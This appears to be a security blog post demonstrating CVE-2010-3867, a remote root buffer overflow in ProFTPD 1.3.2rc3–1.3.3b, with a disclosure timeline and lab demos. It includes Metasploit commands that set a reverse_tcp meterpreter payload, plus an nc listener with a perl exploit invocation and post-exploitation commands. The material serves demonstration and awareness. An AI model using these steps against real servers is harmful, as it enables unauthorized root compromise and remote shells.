aka wow on ZATAZ.com
CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
Timeline :
Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07
PoC provided by :
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
Reference(s) :
Affected version(s) :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description :
This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
Metasploit Demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig
I recommend you to read these related posts
- CVE-2010-3867 : You wanna play with ProFTPD ?
- OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution
- SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
- vsftpd v2.3.4 Backdoor Command Execution
- Anonymous FTP scanning differences between Metasploit and Nmap
- IIS5 & 6 FTP Stack Overflow 0day
- SUC020 : Potential FTP non anonymous Login and/or Brute-Force attempt
- MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
- CVE-2012-0217 Intel’s sysret Kernel Privilege Escalation on FreeBSD Demo
- Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo
